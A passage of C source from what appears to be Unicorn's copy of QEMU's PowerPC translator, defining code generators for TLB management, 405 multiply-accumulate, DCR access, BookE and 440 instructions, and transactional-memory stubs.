*ctx) { /* XXX: TODO */ gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); } /* mfrom */ static void gen_mfrom(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_602_mfrom(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)]); } /* 602 - 603 - G2 TLB management */ /* tlbld */ static void gen_tlbld_6xx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_6xx_tlbd(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); } /* tlbli */ static void gen_tlbli_6xx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_6xx_tlbi(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); } /* 74xx TLB management */ /* tlbld */ static void gen_tlbld_74xx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_74xx_tlbd(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); } /* tlbli */ static void gen_tlbli_74xx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_74xx_tlbi(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); } /* POWER instructions not in PowerPC 601 */ /* clf */ static void gen_clf(DisasContext *ctx) { /* Cache line flush: implemented as no-op */ } /* cli */ static void gen_cli(DisasContext *ctx) { /* Cache line invalidate: privileged and treated as no-op */ CHK_SV; } /* dclst */ static void gen_dclst(DisasContext *ctx) { /* Data cache line store: treated as no-op */ } static void gen_mfsri(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int ra = rA(ctx->opcode); int rd = rD(ctx->opcode); TCGv t0; CHK_SV; t0 = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, t0); tcg_gen_extract_tl(tcg_ctx, t0, t0, 28, 4); gen_helper_load_sr(tcg_ctx, cpu_gpr[rd], tcg_ctx->cpu_env, t0); tcg_temp_free(tcg_ctx, t0); if (ra != 0 && ra != rd) { tcg_gen_mov_tl(tcg_ctx, cpu_gpr[ra], cpu_gpr[rd]); } } static void gen_rac(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; CHK_SV; t0 = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, t0); gen_helper_rac(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, t0); tcg_temp_free(tcg_ctx, t0); } static void gen_rfsvc(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_rfsvc(tcg_ctx, tcg_ctx->cpu_env); gen_sync_exception(ctx); } /* svc is not implemented for now */ /* BookE specific instructions */ /* XXX: not implemented on 440 ?
*/ static void gen_mfapidi(DisasContext *ctx) { /* XXX: TODO */ gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); } /* XXX: not implemented on 440 ? */ static void gen_tlbiva(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; CHK_SV; t0 = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, t0); gen_helper_tlbiva(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); tcg_temp_free(tcg_ctx, t0); } /* All 405 MAC instructions are translated here */ static inline void gen_405_mulladd_insn(DisasContext *ctx, int opc2, int opc3, int ra, int rb, int rt, int Rc) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1; t0 = tcg_temp_local_new(tcg_ctx); t1 = tcg_temp_local_new(tcg_ctx); switch (opc3 & 0x0D) { case 0x05: /* macchw - macchw. - macchwo - macchwo. */ /* macchws - macchws. - macchwso - macchwso. */ /* nmacchw - nmacchw. - nmacchwo - nmacchwo. */ /* nmacchws - nmacchws. - nmacchwso - nmacchwso. */ /* mulchw - mulchw. */ tcg_gen_ext16s_tl(tcg_ctx, t0, cpu_gpr[ra]); tcg_gen_sari_tl(tcg_ctx, t1, cpu_gpr[rb], 16); tcg_gen_ext16s_tl(tcg_ctx, t1, t1); break; case 0x04: /* macchwu - macchwu. - macchwuo - macchwuo. */ /* macchwsu - macchwsu. - macchwsuo - macchwsuo. */ /* mulchwu - mulchwu. */ tcg_gen_ext16u_tl(tcg_ctx, t0, cpu_gpr[ra]); tcg_gen_shri_tl(tcg_ctx, t1, cpu_gpr[rb], 16); tcg_gen_ext16u_tl(tcg_ctx, t1, t1); break; case 0x01: /* machhw - machhw. - machhwo - machhwo. */ /* machhws - machhws. - machhwso - machhwso. */ /* nmachhw - nmachhw. - nmachhwo - nmachhwo. */ /* nmachhws - nmachhws. - nmachhwso - nmachhwso. */ /* mulhhw - mulhhw. */ tcg_gen_sari_tl(tcg_ctx, t0, cpu_gpr[ra], 16); tcg_gen_ext16s_tl(tcg_ctx, t0, t0); tcg_gen_sari_tl(tcg_ctx, t1, cpu_gpr[rb], 16); tcg_gen_ext16s_tl(tcg_ctx, t1, t1); break; case 0x00: /* machhwu - machhwu. - machhwuo - machhwuo. */ /* machhwsu - machhwsu. - machhwsuo - machhwsuo. */ /* mulhhwu - mulhhwu. */ tcg_gen_shri_tl(tcg_ctx, t0, cpu_gpr[ra], 16); tcg_gen_ext16u_tl(tcg_ctx, t0, t0); tcg_gen_shri_tl(tcg_ctx, t1, cpu_gpr[rb], 16); tcg_gen_ext16u_tl(tcg_ctx, t1, t1); break; case 0x0D: /* maclhw - maclhw. - maclhwo - maclhwo. */ /* maclhws - maclhws. - maclhwso - maclhwso. */ /* nmaclhw - nmaclhw. - nmaclhwo - nmaclhwo. */ /* nmaclhws - nmaclhws. - nmaclhwso - nmaclhwso. */ /* mullhw - mullhw. */ tcg_gen_ext16s_tl(tcg_ctx, t0, cpu_gpr[ra]); tcg_gen_ext16s_tl(tcg_ctx, t1, cpu_gpr[rb]); break; case 0x0C: /* maclhwu - maclhwu. - maclhwuo - maclhwuo. */ /* maclhwsu - maclhwsu. - maclhwsuo - maclhwsuo. */ /* mullhwu - mullhwu. 
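 * Both operands are the zero-extended low halfwords here. Once a case has
 * selected and extended the two 16-bit operands, the remaining opcode bits
 * steer the common code below: opc2 bit 0x04 requests accumulation into rT
 * (with bit 0x02 subtracting the product instead of adding it), while opc3
 * bit 0x01 selects signed arithmetic, bit 0x02 saturation and bit 0x10 the
 * XER[OV]/XER[SO] update.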
*/ tcg_gen_ext16u_tl(tcg_ctx, t0, cpu_gpr[ra]); tcg_gen_ext16u_tl(tcg_ctx, t1, cpu_gpr[rb]); break; } if (opc2 & 0x04) { /* (n)multiply-and-accumulate (0x0C / 0x0E) */ tcg_gen_mul_tl(tcg_ctx, t1, t0, t1); if (opc2 & 0x02) { /* nmultiply-and-accumulate (0x0E) */ tcg_gen_sub_tl(tcg_ctx, t0, cpu_gpr[rt], t1); } else { /* multiply-and-accumulate (0x0C) */ tcg_gen_add_tl(tcg_ctx, t0, cpu_gpr[rt], t1); } if (opc3 & 0x12) { /* Check overflow and/or saturate */ TCGLabel *l1 = gen_new_label(tcg_ctx); if (opc3 & 0x10) { /* Start with XER OV disabled, the most likely case */ tcg_gen_movi_tl(tcg_ctx, cpu_ov, 0); } if (opc3 & 0x01) { /* Signed */ tcg_gen_xor_tl(tcg_ctx, t1, cpu_gpr[rt], t1); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, t1, 0, l1); tcg_gen_xor_tl(tcg_ctx, t1, cpu_gpr[rt], t0); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_LT, t1, 0, l1); if (opc3 & 0x02) { /* Saturate */ tcg_gen_sari_tl(tcg_ctx, t0, cpu_gpr[rt], 31); tcg_gen_xori_tl(tcg_ctx, t0, t0, 0x7fffffff); } } else { /* Unsigned */ tcg_gen_brcond_tl(tcg_ctx, TCG_COND_GEU, t0, t1, l1); if (opc3 & 0x02) { /* Saturate */ tcg_gen_movi_tl(tcg_ctx, t0, UINT32_MAX); } } if (opc3 & 0x10) { /* Check overflow */ tcg_gen_movi_tl(tcg_ctx, cpu_ov, 1); tcg_gen_movi_tl(tcg_ctx, cpu_so, 1); } gen_set_label(tcg_ctx, l1); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rt], t0); } } else { tcg_gen_mul_tl(tcg_ctx, cpu_gpr[rt], t0, t1); } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); if (unlikely(Rc != 0)) { /* Update Rc0 */ gen_set_Rc0(ctx, cpu_gpr[rt]); } } #define GEN_MAC_HANDLER(name, opc2, opc3) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ gen_405_mulladd_insn(ctx, opc2, opc3, rA(ctx->opcode), rB(ctx->opcode), \ rD(ctx->opcode), Rc(ctx->opcode)); \ } /* macchw - macchw. */ GEN_MAC_HANDLER(macchw, 0x0C, 0x05); /* macchwo - macchwo. */ GEN_MAC_HANDLER(macchwo, 0x0C, 0x15); /* macchws - macchws. */ GEN_MAC_HANDLER(macchws, 0x0C, 0x07); /* macchwso - macchwso. */ GEN_MAC_HANDLER(macchwso, 0x0C, 0x17); /* macchwsu - macchwsu. */ GEN_MAC_HANDLER(macchwsu, 0x0C, 0x06); /* macchwsuo - macchwsuo. */ GEN_MAC_HANDLER(macchwsuo, 0x0C, 0x16); /* macchwu - macchwu. */ GEN_MAC_HANDLER(macchwu, 0x0C, 0x04); /* macchwuo - macchwuo. */ GEN_MAC_HANDLER(macchwuo, 0x0C, 0x14); /* machhw - machhw. */ GEN_MAC_HANDLER(machhw, 0x0C, 0x01); /* machhwo - machhwo. */ GEN_MAC_HANDLER(machhwo, 0x0C, 0x11); /* machhws - machhws. */ GEN_MAC_HANDLER(machhws, 0x0C, 0x03); /* machhwso - machhwso. */ GEN_MAC_HANDLER(machhwso, 0x0C, 0x13); /* machhwsu - machhwsu. */ GEN_MAC_HANDLER(machhwsu, 0x0C, 0x02); /* machhwsuo - machhwsuo. */ GEN_MAC_HANDLER(machhwsuo, 0x0C, 0x12); /* machhwu - machhwu. */ GEN_MAC_HANDLER(machhwu, 0x0C, 0x00); /* machhwuo - machhwuo. */ GEN_MAC_HANDLER(machhwuo, 0x0C, 0x10); /* maclhw - maclhw. */ GEN_MAC_HANDLER(maclhw, 0x0C, 0x0D); /* maclhwo - maclhwo. */ GEN_MAC_HANDLER(maclhwo, 0x0C, 0x1D); /* maclhws - maclhws. */ GEN_MAC_HANDLER(maclhws, 0x0C, 0x0F); /* maclhwso - maclhwso. */ GEN_MAC_HANDLER(maclhwso, 0x0C, 0x1F); /* maclhwu - maclhwu. */ GEN_MAC_HANDLER(maclhwu, 0x0C, 0x0C); /* maclhwuo - maclhwuo. */ GEN_MAC_HANDLER(maclhwuo, 0x0C, 0x1C); /* maclhwsu - maclhwsu. */ GEN_MAC_HANDLER(maclhwsu, 0x0C, 0x0E); /* maclhwsuo - maclhwsuo. */ GEN_MAC_HANDLER(maclhwsuo, 0x0C, 0x1E); /* nmacchw - nmacchw. */ GEN_MAC_HANDLER(nmacchw, 0x0E, 0x05); /* nmacchwo - nmacchwo. */ GEN_MAC_HANDLER(nmacchwo, 0x0E, 0x15); /* nmacchws - nmacchws. */ GEN_MAC_HANDLER(nmacchws, 0x0E, 0x07); /* nmacchwso - nmacchwso. */ GEN_MAC_HANDLER(nmacchwso, 0x0E, 0x17); /* nmachhw - nmachhw.
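 * The opc3 values in this table spell out the modifier bits decoded in
 * gen_405_mulladd_insn: each 'o' (overflow) variant is its base encoding
 * plus 0x10, each saturating 's' variant adds 0x02, and the unsigned 'u'
 * variants clear bit 0x01.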
*/ GEN_MAC_HANDLER(nmachhw, 0x0E, 0x01); /* nmachhwo - nmachhwo. */ GEN_MAC_HANDLER(nmachhwo, 0x0E, 0x11); /* nmachhws - nmachhws. */ GEN_MAC_HANDLER(nmachhws, 0x0E, 0x03); /* nmachhwso - nmachhwso. */ GEN_MAC_HANDLER(nmachhwso, 0x0E, 0x13); /* nmaclhw - nmaclhw. */ GEN_MAC_HANDLER(nmaclhw, 0x0E, 0x0D); /* nmaclhwo - nmaclhwo. */ GEN_MAC_HANDLER(nmaclhwo, 0x0E, 0x1D); /* nmaclhws - nmaclhws. */ GEN_MAC_HANDLER(nmaclhws, 0x0E, 0x0F); /* nmaclhwso - nmaclhwso. */ GEN_MAC_HANDLER(nmaclhwso, 0x0E, 0x1F); /* mulchw - mulchw. */ GEN_MAC_HANDLER(mulchw, 0x08, 0x05); /* mulchwu - mulchwu. */ GEN_MAC_HANDLER(mulchwu, 0x08, 0x04); /* mulhhw - mulhhw. */ GEN_MAC_HANDLER(mulhhw, 0x08, 0x01); /* mulhhwu - mulhhwu. */ GEN_MAC_HANDLER(mulhhwu, 0x08, 0x00); /* mullhw - mullhw. */ GEN_MAC_HANDLER(mullhw, 0x08, 0x0D); /* mullhwu - mullhwu. */ GEN_MAC_HANDLER(mullhwu, 0x08, 0x0C); /* mfdcr */ static void gen_mfdcr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv dcrn; CHK_SV; dcrn = tcg_const_tl(tcg_ctx, SPR(ctx->opcode)); gen_helper_load_dcr(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, dcrn); tcg_temp_free(tcg_ctx, dcrn); } /* mtdcr */ static void gen_mtdcr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv dcrn; CHK_SV; dcrn = tcg_const_tl(tcg_ctx, SPR(ctx->opcode)); gen_helper_store_dcr(tcg_ctx, tcg_ctx->cpu_env, dcrn, cpu_gpr[rS(ctx->opcode)]); tcg_temp_free(tcg_ctx, dcrn); } /* mfdcrx */ /* XXX: not implemented on 440 ? */ static void gen_mfdcrx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_load_dcr(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, cpu_gpr[rA(ctx->opcode)]); /* Note: Rc update flag set leads to undefined state of Rc0 */ } /* mtdcrx */ /* XXX: not implemented on 440 ? */ static void gen_mtdcrx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_store_dcr(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)]); /* Note: Rc update flag set leads to undefined state of Rc0 */ } /* mfdcrux (PPC 460) : user-mode access to DCR */ static void gen_mfdcrux(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_load_dcr(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, cpu_gpr[rA(ctx->opcode)]); /* Note: Rc update flag set leads to undefined state of Rc0 */ } /* mtdcrux (PPC 460) : user-mode access to DCR */ static void gen_mtdcrux(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_store_dcr(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)]); /* Note: Rc update flag set leads to undefined state of Rc0 */ } /* dccci */ static void gen_dccci(DisasContext *ctx) { CHK_SV; /* interpreted as no-op */ } /* dcread */ static void gen_dcread(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA, val; CHK_SV; gen_set_access_type(ctx, ACCESS_CACHE); EA = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, EA); val = tcg_temp_new(tcg_ctx); gen_qemu_ld32u(ctx, val, EA); tcg_temp_free(tcg_ctx, val); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], EA); tcg_temp_free(tcg_ctx, EA); } /* icbt */ static void gen_icbt_40x(DisasContext *ctx) { /* * interpreted as no-op * XXX: the specification says this is treated as a load by the MMU but * does not generate any exception */ } /* iccci */ static void gen_iccci(DisasContext *ctx) { CHK_SV; /* interpreted as no-op */ } /* icread */ static void gen_icread(DisasContext *ctx) { CHK_SV; /* interpreted as no-op */ } /* rfci (supervisor only) */ static void
gen_rfci_40x(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; /* Restore CPU state */ gen_helper_40x_rfci(tcg_ctx, tcg_ctx->cpu_env); gen_sync_exception(ctx); } static void gen_rfci(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; /* Restore CPU state */ gen_helper_rfci(tcg_ctx, tcg_ctx->cpu_env); gen_sync_exception(ctx); } /* BookE specific */ /* XXX: not implemented on 440 ? */ static void gen_rfdi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; /* Restore CPU state */ gen_helper_rfdi(tcg_ctx, tcg_ctx->cpu_env); gen_sync_exception(ctx); } /* XXX: not implemented on 440 ? */ static void gen_rfmci(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; /* Restore CPU state */ gen_helper_rfmci(tcg_ctx, tcg_ctx->cpu_env); gen_sync_exception(ctx); } /* TLB management - PowerPC 405 implementation */ /* tlbre */ static void gen_tlbre_40x(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; switch (rB(ctx->opcode)) { case 0: gen_helper_4xx_tlbre_hi(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, cpu_gpr[rA(ctx->opcode)]); break; case 1: gen_helper_4xx_tlbre_lo(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, cpu_gpr[rA(ctx->opcode)]); break; default: gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); break; } } /* tlbsx - tlbsx. */ static void gen_tlbsx_40x(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; CHK_SV; t0 = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, t0); gen_helper_4xx_tlbsx(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, t0); tcg_temp_free(tcg_ctx, t0); if (Rc(ctx->opcode)) { TCGLabel *l1 = gen_new_label(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, cpu_crf[0], cpu_so); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, cpu_gpr[rD(ctx->opcode)], -1, l1); tcg_gen_ori_i32(tcg_ctx, cpu_crf[0], cpu_crf[0], 0x02); gen_set_label(tcg_ctx, l1); } } /* tlbwe */ static void gen_tlbwe_40x(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; switch (rB(ctx->opcode)) { case 0: gen_helper_4xx_tlbwe_hi(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)]); break; case 1: gen_helper_4xx_tlbwe_lo(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)]); break; default: gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); break; } } /* TLB management - PowerPC 440 implementation */ /* tlbre */ static void gen_tlbre_440(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; switch (rB(ctx->opcode)) { case 0: case 1: case 2: { TCGv_i32 t0 = tcg_const_i32(tcg_ctx, rB(ctx->opcode)); gen_helper_440_tlbre(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, t0, cpu_gpr[rA(ctx->opcode)]); tcg_temp_free_i32(tcg_ctx, t0); } break; default: gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); break; } } /* tlbsx - tlbsx. 
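 * As in the 40x version above, the record form copies XER[SO] into CR0 and
 * sets CR0[EQ] only when the lookup succeeded; a helper result of -1 marks
 * a failed search and leaves CR0[EQ] clear.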
*/ static void gen_tlbsx_440(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; CHK_SV; t0 = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, t0); gen_helper_440_tlbsx(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, t0); tcg_temp_free(tcg_ctx, t0); if (Rc(ctx->opcode)) { TCGLabel *l1 = gen_new_label(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, cpu_crf[0], cpu_so); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, cpu_gpr[rD(ctx->opcode)], -1, l1); tcg_gen_ori_i32(tcg_ctx, cpu_crf[0], cpu_crf[0], 0x02); gen_set_label(tcg_ctx, l1); } } /* tlbwe */ static void gen_tlbwe_440(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; switch (rB(ctx->opcode)) { case 0: case 1: case 2: { TCGv_i32 t0 = tcg_const_i32(tcg_ctx, rB(ctx->opcode)); gen_helper_440_tlbwe(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)]); tcg_temp_free_i32(tcg_ctx, t0); } break; default: gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); break; } } /* TLB management - PowerPC BookE 2.06 implementation */ /* tlbre */ static void gen_tlbre_booke206(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_booke206_tlbre(tcg_ctx, tcg_ctx->cpu_env); } /* tlbsx - tlbsx. */ static void gen_tlbsx_booke206(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; CHK_SV; if (rA(ctx->opcode)) { t0 = tcg_temp_new(tcg_ctx); tcg_gen_mov_tl(tcg_ctx, t0, cpu_gpr[rD(ctx->opcode)]); } else { t0 = tcg_const_tl(tcg_ctx, 0); } tcg_gen_add_tl(tcg_ctx, t0, t0, cpu_gpr[rB(ctx->opcode)]); gen_helper_booke206_tlbsx(tcg_ctx, tcg_ctx->cpu_env, t0); tcg_temp_free(tcg_ctx, t0); } /* tlbwe */ static void gen_tlbwe_booke206(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_booke206_tlbwe(tcg_ctx, tcg_ctx->cpu_env); } static void gen_tlbivax_booke206(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; CHK_SV; t0 = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, t0); gen_helper_booke206_tlbivax(tcg_ctx, tcg_ctx->cpu_env, t0); tcg_temp_free(tcg_ctx, t0); } static void gen_tlbilx_booke206(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; CHK_SV; t0 = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, t0); switch ((ctx->opcode >> 21) & 0x3) { case 0: gen_helper_booke206_tlbilx0(tcg_ctx, tcg_ctx->cpu_env, t0); break; case 1: gen_helper_booke206_tlbilx1(tcg_ctx, tcg_ctx->cpu_env, t0); break; case 3: gen_helper_booke206_tlbilx3(tcg_ctx, tcg_ctx->cpu_env, t0); break; default: gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); break; } tcg_temp_free(tcg_ctx, t0); } /* wrtee */ static void gen_wrtee(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; CHK_SV; t0 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t0, cpu_gpr[rD(ctx->opcode)], (1 << MSR_EE)); tcg_gen_andi_tl(tcg_ctx, cpu_msr, cpu_msr, ~(1 << MSR_EE)); tcg_gen_or_tl(tcg_ctx, cpu_msr, cpu_msr, t0); tcg_temp_free(tcg_ctx, t0); /* * Stop translation to have a chance to raise an exception if we * just set msr_ee to 1 */ gen_stop_exception(ctx); } /* wrteei */ static void gen_wrteei(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; if (ctx->opcode & 0x00008000) { tcg_gen_ori_tl(tcg_ctx, cpu_msr, cpu_msr, (1 << MSR_EE)); /* Stop translation to have a chance to raise an exception */ gen_stop_exception(ctx); } else { tcg_gen_andi_tl(tcg_ctx, cpu_msr, cpu_msr, ~(1 << MSR_EE)); } } /* PowerPC 440 specific instructions */ /* dlmzb */ static void gen_dlmzb(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = 
tcg_const_i32(tcg_ctx, Rc(ctx->opcode)); gen_helper_dlmzb(tcg_ctx, cpu_gpr[rA(ctx->opcode)], tcg_ctx->cpu_env, cpu_gpr[rS(ctx->opcode)], cpu_gpr[rB(ctx->opcode)], t0); tcg_temp_free_i32(tcg_ctx, t0); } /* mbar replaces eieio on 440 */ static void gen_mbar(DisasContext *ctx) { /* interpreted as no-op */ } /* msync replaces sync on 440 */ static void gen_msync_4xx(DisasContext *ctx) { /* Only e500 seems to treat reserved bits as invalid */ if ((ctx->insns_flags2 & PPC2_BOOKE206) && (ctx->opcode & 0x03FFF801)) { gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); } /* otherwise interpreted as no-op */ } /* icbt */ static void gen_icbt_440(DisasContext *ctx) { /* * interpreted as no-op * XXX: the specification says this is treated as a load by the MMU but * does not generate any exception */ } /* Embedded.Processor Control */ static void gen_msgclr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_HV; if (is_book3s_arch2x(ctx)) { gen_helper_book3s_msgclr(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); } else { gen_helper_msgclr(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); } } static void gen_msgsnd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_HV; if (is_book3s_arch2x(ctx)) { gen_helper_book3s_msgsnd(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); } else { gen_helper_msgsnd(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); } } #if defined(TARGET_PPC64) static void gen_msgclrp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_book3s_msgclrp(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); } static void gen_msgsndp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_book3s_msgsndp(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); } #endif static void gen_msgsync(DisasContext *ctx) { CHK_HV; /* interpreted as no-op */ } #if defined(TARGET_PPC64) static void gen_maddld(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_mul_i64(tcg_ctx, t1, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); tcg_gen_add_i64(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t1, cpu_gpr[rC(ctx->opcode)]); tcg_temp_free_i64(tcg_ctx, t1); } /* maddhd maddhdu */ static void gen_maddhd_maddhdu(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 lo = tcg_temp_new_i64(tcg_ctx); TCGv_i64 hi = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); if (Rc(ctx->opcode)) { tcg_gen_mulu2_i64(tcg_ctx, lo, hi, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); tcg_gen_movi_i64(tcg_ctx, t1, 0); } else { tcg_gen_muls2_i64(tcg_ctx, lo, hi, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); tcg_gen_sari_i64(tcg_ctx, t1, cpu_gpr[rC(ctx->opcode)], 63); } tcg_gen_add2_i64(tcg_ctx, t1, cpu_gpr[rD(ctx->opcode)], lo, hi, cpu_gpr[rC(ctx->opcode)], t1); tcg_temp_free_i64(tcg_ctx, lo); tcg_temp_free_i64(tcg_ctx, hi); tcg_temp_free_i64(tcg_ctx, t1); } #endif /* defined(TARGET_PPC64) */ static void gen_tbegin(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (unlikely(!ctx->tm_enabled)) { gen_exception_err(ctx, POWERPC_EXCP_FU, FSCR_IC_TM); return; } gen_helper_tbegin(tcg_ctx, tcg_ctx->cpu_env); } #define GEN_TM_NOOP(name) \ static inline void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ if (unlikely(!ctx->tm_enabled)) { \ gen_exception_err(ctx, POWERPC_EXCP_FU, FSCR_IC_TM); \ return; \ } \ /* \ * Because tbegin always fails in QEMU, these user \ * space instructions all have a simple implementation: \
